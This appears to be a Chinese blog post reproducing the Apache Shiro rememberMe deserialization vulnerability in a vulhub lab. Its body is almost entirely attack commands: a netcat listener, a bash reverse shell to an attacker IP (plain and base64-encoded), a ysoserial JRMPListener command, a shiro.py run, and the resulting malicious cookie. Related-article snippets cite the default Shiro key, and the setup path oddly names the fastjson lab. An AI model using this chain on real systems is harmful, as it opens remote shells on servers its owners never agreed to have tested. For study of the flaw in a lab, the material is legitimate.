复现Apache shiro漏洞

最新推荐文章于 2025-11-27 18:17:27 发布
原创 最新推荐文章于 2025-11-27 18:17:27 发布 · 379 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#apache

TargetMachine

cd /var/local/soft/

/var/local/soft/vulhub-master/fastjson/1.2.47-rce

docker-compose build (拉取镜像、创建容器)

docker-compose up -d (启动容器,自动拉取)

http://192.168.23.151:8080/login

Attacker

Kali机器(192.168.23.133)

nc -lvp 7777

bash -i >& /dev/tcp/192.168.23.133/7777 0>&1

工具:https://ares-x.com/tools/runtime-exec/

结果:

bash -c

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzLjEzMy83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}

java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 8888 CommonsCollections5 " bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzLjEzMy83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}"

Kali机器(192.168.142.132)

pip3 install pycryptodome #先安装加密模块

python3 shiro.py 192.168.23.133:8888

结果:

rememberMe=3+drH8gkQ92frOI6nq5sI6ugp7L0uGFJ74YCE/LnDJTAzeNfplK1EwC7WRrSjfcSkaefDsq/TIMSPQNjXeRh6X/BtafSiQd3qfLipdt3XBmwMAD8jyyhHb3fsWuvSCBYhGr0SuumdB4eQZ4yoBDQ+ghWurzgKecr1npZ99toI16oDXQfV8Udvk65dJkzP26ZDZNYcB+dB4GB+cRWAltF1lHcFzG8HIIARROejouSw8Ryfzvn438k1LwwFtI0de2q+9Dl9Yi9Br3GxsUTAhJQM9q+999Xo5HaG+1qWURYJfL8ZfUDtLmHK2Fr4HZbn2y4WXFXe4DAlb1cpIBIN2adTwyUXMo2h3vlGIaaV6EW2WnKZ7kB7EiCh/KsBEXnpglD4UKD3GrbO+B4i9hElS1/iw==

观浩
关注
Apache Shiro漏洞复现
牟先生的学习博客
09-10 1292
Apache Shiro 认证绕过漏洞 CVE-2020-1957 1. 漏洞描述 Apache Shiro 1.5.2之前版本中存在安全漏洞。攻击者可借助特制的请求利用该漏洞绕过身份验证。 Shiro框架通过拦截器功能来对用户访问权限进行控制,如anon, authc等拦截器。anon为匿名拦截器,不需要登录即可访问;authc为登录拦截器,需要登录才可以访问。可以通过构造恶意的URL进行越权实现未授权访问。 2.环境搭建 之前已经搭建过vulhub环境,直接进入vulhub/shiro/CVE-2020
shiro漏洞复现
ubaichu的博客
09-16 1317
shiro漏洞复现
Apache Shiro 漏洞复现
来日可期的博客
10-10 1184
Apache Shiro 1.2.4及以前版本中,Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。在代码中全局搜索 “setCipherKey(Base64.decode(” 关键字,或者"setCipherKey"方法,Base64.decode()中的字符串就是shiro的密钥,要确保该密钥的安全性,千万不要使用公开的密钥。利用Shiro工具进行链接。
apache shiro漏洞复现
赵花花08042的博客
12-13 928
Shiro框架下,用户登陆成功后会生成一个经过加密的Cookie。
复现Apache Shiro 1.2.4反序列化漏洞
qq_63526413的博客
06-05 257
安装python2环境,并把shiro.exploit.py脚本和他调用的ysoserial.jar放入。复现Apache Shiro 1.2.4反序列化漏洞。安装pycrypto pycryptodome脚本。安装python2中插件。安装request脚本。
Apache shiro 漏洞总结
星落的博客
08-01 4959
Apache shiro 漏洞总结 Apache shiro是一个强大灵活的开源安全框架,可以完全处理身份验证、授权、密码和会话管理。
框架安全-CVE 复现&Apache Shiro&Apache Solr漏洞复现
网络空间安全学习
11-02 2142
Solr 是一个高性能,采用 Java5 开发。Solr 任意文件读取该漏洞是由于没有对输入的内容进行校验,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行SSRF攻击,最终造成任意读取服务器上的文件。 中间件:IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flask,jQuery 等。
vulhub漏洞复现 Apache Shiro 1.2.4反序列化漏洞 Apache Shiro 认证绕过漏洞
web13170611647的博客
08-26 249
Apache Shiro框架提供了记住我的功能(RememberMe),用户登陆成功后会生成经过加密并编码的cookie,在服务端接收cookie值后,Base64解码–>AES解密–>反序列化。攻击者只要找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化–>AES加密–>Base64编码,然后将其作为cookie的rememberMe字段发送,Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞。...
漏洞复现Apache_Shiro_1.2.4_反序列化漏洞(CVE-2016-4437)
过期的秋刀鱼
11-05 1109
由于使用了aes加密,想要成功利用漏洞则需要获取ase的加密秘钥,而在shiro的1.2.4之前的版本中使用的硬编码。其中默认秘钥的b ase64编码后的值为kPH+bIxk5D2deZiIxcaaaA==,这里就可以通过构造恶意的序列化对象进行编码,加密,然后欧威cooike加密发送,服务端接受后会解密并触发反序列化漏洞。cookie的key为rememberme,cookie的值是经过对相关的信息进行序列化,然后实用aes加密,最后在使用b ase64编码处理形成的。字段,登陆成功的话,返回包。
Shiro-550漏洞详解及复现
m0_64481831的博客
03-07 3268
ShiroApache的一个强大且易用的Java安全框架,用于执行身份验证、授权、密码和会话管理。借助Shiro易于理解的API,用户可以快速轻松地保护任何应用程序----从最小的移动应用程序到最大的web和企业应用程序。Shiro是一个Java的安全框架,用于执行身份验证、授权、密码和会话验证。
框架、组件漏洞系列4:Apache shiro漏洞汇总
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
12-14 4159
一、Apache Shiro 简介 1、什么是shiro Apache Shiro提供了认证、授权、加密和会话管理功能,将复杂的问题隐藏起来,提供清晰直观的API使开发者可以很轻松地开发自己的程序安全代码。并且在实现此目标时无须依赖第三方的框架、容器或服务,当然也能做到与这些环境的整合,使其在任何环境下都可拿来使用。 Shiro将目标集中于Shiro开发团队所称的“四大安全基石”-认证(Authentication)、授权(Authorization)、会话管理(Session Management)和加.
知识付费系统源码,资源网站,支持pc和h5
最新发布
11-27 120
使用它不需要复杂手续,网站前端可自由排版,导航栏、资源分类、站长推荐、网站新发布、网站滚动信息、用户注册等版块,都可在后台进行设置。网站具有多变性和个性化,适用于各类知识付费资源类网站。采集软件是电脑版的高铁采集器又称火车头采集器,安装即可运行使用。5→外边卖几十几百的90%的项目都有。6→包含搭建网站所需要要的所有东西。7→小白可自行观看教程搭建。4→每天更新20+网创资源。3→自带1W+课程资源。2→自动更新释放双手。
Apache IoTDB 触发器完全指南
手心朝下的博客
11-24 246
Apache IoTDB触发器指南:专为物联网时序数据设计的自动化处理组件,支持在数据增删改时触发预设逻辑(告警、校验、同步等)。核心特性包括事件驱动(INSERT/UPDATE/DELETE)、时序优化(异步/批量处理)、灵活扩展(SQL/Java自定义)。实操部分详解SQL原生触发器创建语法,提供温度超标告警和非法数据拦截两个典型示例,并介绍触发器管理命令。适用于需要实时处理IoT数据的场景,兼顾轻量级与高性能。
apache seatunnel 2.3.12 Changelog
xqdd的专栏
11-24 760
apache seatunnel 2.3.12版本记录
Apache SeaTunnel介绍
清平乐的技术专栏
11-24 667
Apache SeaTunnel(原名 Waterdrop)是一款高性能、分布式的开源数据集成平台,主打海量数据的同步、ETL 处理等场景,能解决多数据源兼容、同步场景复杂等行业痛点,目前已成为 Apache 顶级项目,被近百家企业应用于生产环境。
【保姆级教程】apache-tomcat的安装配置教程
2509_94186028的博客
11-25 980
一、前提二、文件目录含义三、运行tomcat四、运行成功效果五、使用tomcat打开本地端口为8080的网页六、用tomcat打开自己的.html文件七、用tomcat打开.html文件和鼠标右键打开.html文件的区别八、tomcat点击运行,cmd窗口出现后闪退解决九、附:修改端口号的方法。
Apache SeaTunnel的发展历程
清平乐的技术专栏
11-24 316
Apache SeaTunnel 的发展历程是一部从国产开源小项目成长为全球认可的 Apache 顶级项目的进阶史,其前身是 Waterdrop,历经开源起步、Apache 孵化、顶级项目成熟发展等多个关键阶段,下面博主对几个重要时间节点进行梳理。
Python结合Apache Spark与Kafka构建高性能实时大数据分析平台设计与实践分享:沈阳互联网广告实时投放落地经验
2501_94187528的博客
11-23 721
保证高吞吐与低延迟Redis 缓存热点广告提升查询性能分布式容错与 checkpoint保证数据可靠性可视化 Dashboard实时展示业务指标监控与自动扩容确保高峰稳定运行通过该架构,沈阳广告平台实现亿级实时数据分析、秒级广告效果反馈和高可用运行,为精准投放和运营决策提供可靠技术支撑。
Apache SeaTunnel和其他数据集成工具对比
清平乐的技术专栏
11-24 714
Apache SeaTunnel 相较于 DataX、Flink CDC、Talend 等主流数据集成工具,在性能、部署易用性、多场景适配性等多个维度都具备显著优势。博主分别结合不同工具做了以下对比分析。
分析Apache Shiro漏洞CVE-2020-17523的两种绕过方法
搭建这样的测试环境,需要对Shiro和Spring的集成有深入的理解,以确保能够正确复现漏洞,并进行后续的安全测试和验证。 POC测试: 文档中提到了两种绕过Shiro认证的姿势: 1. 第一种姿势描述了通过在HTTP请求中使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值